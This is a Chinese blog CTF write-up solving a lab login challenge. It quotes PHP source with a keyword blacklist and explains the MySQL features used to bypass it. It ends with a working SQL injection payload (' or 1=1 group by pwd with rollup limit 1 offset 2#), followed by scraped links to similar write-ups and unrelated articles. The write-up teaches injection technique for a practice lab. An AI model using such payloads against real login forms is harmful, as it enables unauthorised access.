实验吧 因缺思汀的绕过

最新推荐文章于 2022-04-16 20:16:01 发布
最新推荐文章于 2022-04-16 20:16:01 发布
阅读量532 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/windseraph2/article/details/71908320
版权

解题连接http://ctf5.shiyanbar.com/web/pcat/index.php 

查看源代码

 <form action="" method="post"><br/><inputname="uname"type="text"/><br/><inputname="pwd"type="text"/><br/><inputtype="submit" /><br/></form><br/><!--source: source.txt--><br/>

查看http://ctf5.shiyanbar.com/web/pcat/source.txt

<?php
error_reporting(0);

if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
	echo '<form action="" method="post">'."<br/>";
	echo '<input name="uname" type="text"/>'."<br/>";
	echo '<input name="pwd" type="text"/>'."<br/>";
	echo '<input type="submit" />'."<br/>";
	echo '</form>'."<br/>";
	echo '<!--source: source.txt-->'."<br/>";
    die;
}

function AttackFilter($StrKey,$StrValue,$ArrReq){  
    if (is_array($StrValue)){
        $StrValue=implode($StrValue);
    }
    if (preg_match("/".$ArrReq."/is",$StrValue)==1){   
        print "姘村彲杞借垷锛屼害鍙禌鑹囷紒";
        exit();
    }
}

$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
    AttackFilter($key,$value,$filter);
}

$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX");
if (!$con){
	die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con);
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
if (mysql_num_rows($query) == 1) { 
    $key = mysql_fetch_array($query);
    if($key['pwd'] == $_POST['pwd']) {
        print "CTF{XXXXXX}";
    }else{
        print "浜﹀彲璧涜墖锛�";
    }
}else{
	print "涓€棰楄禌鑹囷紒";
}
mysql_close($con);
?>
发现过滤了不少东西,查询语句为 
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
第一层 
if (mysql_num_rows($query) == 1)
Mysql知识点:limit

例如limit 1 就是从第一条开始查,limit 2 从第二条开始查。


第二层

if($key['pwd'] == $_POST['pwd'])
当pwd查出来的为空就行了

Mysql知识点:group by pwd with rollup

转载http://blog.youkuaiyun.com/id19870510/article/details/6254358点击打开链接

发现新建的第二条为空。

如果我们希望再显示部门的平均值和全部雇员的平均值,普通的 GROUP BY 语句是不能实现的,需要另外执行一个查询操作,或者通过程序来计算。如果使用有 WITH ROLLUP 子句的 GROUP BY 语句,则可以轻松实现这个要求:


[Java]  view plain  copy
  1. mysql> select dep,pos,avg(sal) from employee group by dep,pos with rollup;  
  2. +------+------+-----------+  
  3. | dep | pos | avg(sal) |  
  4. +------+------+-----------+  
  5. 01 | 01 | 1500.0000 |  
  6. 01 | 02 | 1950.0000 |  
  7. 01 | NULL | 1725.0000 |  
  8. 02 | 01 | 1500.0000 |  
  9. 02 | 02 | 2450.0000 |  
  10. 02 | NULL | 2133.3333 |  
  11. 03 | 01 | 2500.0000 |  
  12. 03 | 02 | 2550.0000 |  
  13. 03 | NULL | 2533.3333 |  
  14. | NULL | NULL | 2090.0000 |  
  15. +------+------+-----------+  
  16. 10 rows in set (0.00 sec)  
Mysql知识点:offset

如limit 1 offset 1就是从第一条开始查的第一条

limit 1 offset 2就是从第一条开始查的第二条

Mysql知识点:#号

#号的作用是注释掉后面语句,因为响应是uname=&pwd=

所以要将后面的&pwd=注释掉


所以payload为

' or 1=1 group by pwd with rollup limit 1 offset 2#

CTF-实验吧因绕过
才不是小弱鸡的博客
05-07 521
web题嘛,第一步肯定是看源码。f12后发现这样一些奇怪的东东接下来肯定是打开这个文件嘛打开后就看到了php源码啦(是不是很开心!)分析一下源码可以看到这里过滤了一些sql语句(嗯,这些东西接下来不能用了)这里的意大概是选择操作的数据库为db(数据库看不到QAQ)然后将咱们输入的uname在数据库查询uname和key,再将key和咱们输入的pwd比对,相等就打印flag。然后就要用一个注入的小...
实验吧-因绕过WriteUp
焚卷觅光的博客
07-22 3107
实验吧-因绕过WriteUp题目地址:http://www.shiyanbar.com/ctf/1940审计网页代码,发现有一个注释:<!--source: source.txt--> 访问同目录下的source.txt 发现登陆的逻辑代码,下面就可以针对它进行绕过。! 这里有三层限制0X00在第一层的filter里面就过滤了常用的SQL关键词,所以常规的SQL 注入就不行了。如
绕过
3569
02-22 1997
阅读源码知道 保证查找内容可控就可以进行绕过 类似 union select 1,2 然后密码填写 2 题目源码 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo ''.""; echo ''.""; echo ''.""; echo ''."
Naver_News_Headtopic_News_Scraper:네이버스에서스뉴스스이크레
02-16
Naver News Scraper:逐个主题 1。 기 능 : 를 보 시 면 각 분 야 (例如: 정 치 , 경 제 , 그 날 의 헤 드 라 인 등 ) 의 대 표 뉴 스 들 이 있 습 니 다 。 시간대이실행하는이이이이이이이이으으져와서으으으크롤러입니 2。 3。 2020/12/14 错误修复:http.client.RemoteDisconnected:远端封闭的连接,无响应 修复:标头用户代理봇으로방지 待办事项:asyncio적비동기적scraping처리 2021年1月5日 错误修复:
实验吧 因绕过 By Assassin(with rollup统计)
Assassin
01-29 7437
这个题目还是比较新鲜的,很久没回实验吧了学到了很多的姿势~不得不说不看提示真心想不到这些,嗯。首先我们需要了解题目中php的工作原理,首先审源码得到了source.txt得到了源码,然后我们看一下源码干了什么,主要就是一个登陆认证!<?php error_reporting(0);if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
实验吧——WEB-因绕过
迷风小白
04-03 2638
绕过 拿到题目发现什么都没有,看一下源码 发现有一个source.txt文件,打开得到php源码 <?php error_reporting(0); if (!isset($_POST['uname']) || !isset($_POST['pwd'])) { echo '<form action="" method="post">'."<br/>"...
CTF实验吧-因绕过【group by with rollup,limit offset的利用】
qq_43679507的博客
01-18 249
CTF实验吧-因绕过【group by with rollup,limit offset的利用】
php intval绕过 注入,PHP代码审计片段讲解(入门代码审计、CTF必备)
weixin_36290287的博客
04-12 1874
关于本项目代码审计对于很多安全圈的新人来说,一直是一件头疼的事情,也想跟着大牛们直接操刀审计CMS?却处处碰壁:函数看不懂!漏洞原理不知道!PHP特性更不知!那还怎么愉快审计?不如化繁为简,跟着本项目先搞懂PHP中大多敏感函数与各类特性,再逐渐增加难度,直到可以吊打各类CMS~本项目讲解基于多道CTF题,玩CTF的WEB狗也不要错过(^-^)V题的源码在Github: bowu (Github),...
实验吧ctf
四盘山博客
07-25 3346
1/登陆一下好吗??http://ctf5.shiyanbar.com/web/wonderkun/web/index.html =' =' ctf{51d1bf8fb65a8c2406513ee8f52283e7} 2/who are you ? http://ctf5.shiyanbar.com/web/wonderkun/index.php import requests impor
네이버 뉴스 댓글 플러스-crx插件
04-02
语言:한국어 Naver Sports News为体育新闻的评论增加了多种方便的功能。 点:此扩展不是Naver Corp.,Naver(Naver Corporation)的官方计划,对此扩展名的错误和客户支持。*******************************************为什么我需要您访问的网站的整个数据查询和变更?*******************************************在此扩展功能期间,它显示了评论表示的URL,并且用户在链接中具有鼠标,并且链接指向链接的功能,并将标题/描述/图像的功能作为预览类型。工具提示。这是访问此扩展的权限,并在任何站点(即,注释中的地址)上读取页面上的页面,而不是当前文章页面(Naver站点)。由于此扩展仅在Naver(体育)新闻页面上,因此在生命周期发生时无法始终运行。此扩展选项 - 为什么?您可以在零件中更详细地检查它。*******************************************提供的扩展名***************************************
特殊符号大全
weixin_43652507的博客
04-16 2万+
特殊符号大全
【C语言篇】☞ 1. 前言、基础
anpan0842的博客
01-26 997
前言 什么是操作系统:操作系统是一种系统软件,用来管理计算机的软硬件资源。 主流操作系统:     移动便携式设备:Android、iOS、Windows Phone、Symbian(塞班)、Black Berry(黑莓) OS     PC个人电脑:Windows、Mac OS、Unix、Linux 什么是iOS:iOS是一款由苹果公司开发的移动操作系统(i...
特殊字符大全-表情字符-指示符号-汉语拼音-希腊字母-俄文-注音-箭头-月日文-花心型-方形-排序-制表-单位,框内字,好看的字符,国际象棋-星座-货币-音乐-聊天表情昵称测试输入等[请勿转载抄袭]
巨蟹上升处女
09-26 6万+
特殊字符大全-汉语 拼音 希腊 字母 俄文 注音 箭头 月 日文 序集花 心型 方形 点数 绘制表单位,框 内字 排序 字符 国际 象棋 星座 货币 音乐 扑克 名称 昵称 测试输入等[已整理]
【Objective-C 篇】 ☞ 1. 基础、语法
anpan0842的博客
02-23 237
1. 第一个OC程序 框架(Framework) 和C的Hello不同: 1) 扩展名(后缀名)为.m 2) 使用Foundation框架 3) 使用#import导入头文件: #import <Foundation/Foundation.h> #import 会自动处理头文件重复导入问题。 4) 使用NSLog函数输出日志信息 5) 使用clang编译器,...
【软件测试】软件测试用例的设计
重心开始,重新开始
01-13 4725
1.测试用例概述 如何以最少的人力、资源投入,在最短的时间内完成测试,发现软件系统的陷,保证软件的优良品质,则是软件公司探索和追求的目标。 测试用例是测试工作的指导,是软件测试的必须遵守的准则,更是软件测试质量稳定的根本保障。  1.1  什么是测试用例 测试用例可以独立进行测试执行的最小单元测试内容的一系列情景和每个情景中必须依靠输入和输出,
Unicode排序编码表全部
热门推荐
before1233的博客
06-28 101万+
排序编码表                           ! " $ % & ’ ( ) * + , . / 0 1 2 3 4 5 6 7 8 9 : ; < ? @ [ ] ^ _ ` a b c d e f g h i j k l m n o p q r s t u v w x y z { | } ~  € ...
Dubbo源码解析:服务目录和路由
小识的博客
06-12 461
介绍 之前的文章我们详细说了服务调用的过程,今天我们就来细化一下MockCluster到FailoverClusterInvoker的调用过程。 当我们有多个服务提供者时,需要根据不同的策略从众多的提供者中选出合适的Invoker来发起调用,那么这些Invoker存放在哪?就在服务目录中。 服务目录还会根据路由策略策略对最终返回的Invoker进行再次过滤。比如ip为A的Consumer只能让它调用ip为B的producer,路由的配置有很多方式,我们详聊。 整体的流程下如图所示 Invoker从D.
Python学习之路1☞简介及入门代码
weixin_30527143的博客
06-04 311
Python学习之路1☞简介及入门代码 在学习之前,首先了解一下python的前世今生 一.python简介与发展: python 是一种面向对象的解释性计算机程序设计语言。 python由荷兰人Guido van Rossum 于1989年发明。 19...
"文件实现方式效率小实验
这篇论述讨论了一些因的小实验不同代码实现方式效率上的差异。作者首先对使用new和delete的常数开销与Buffer开销进行了对比实验,发现new的时间开销几乎是buffer的9倍,因为buffer的内存是连续的,而new的操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值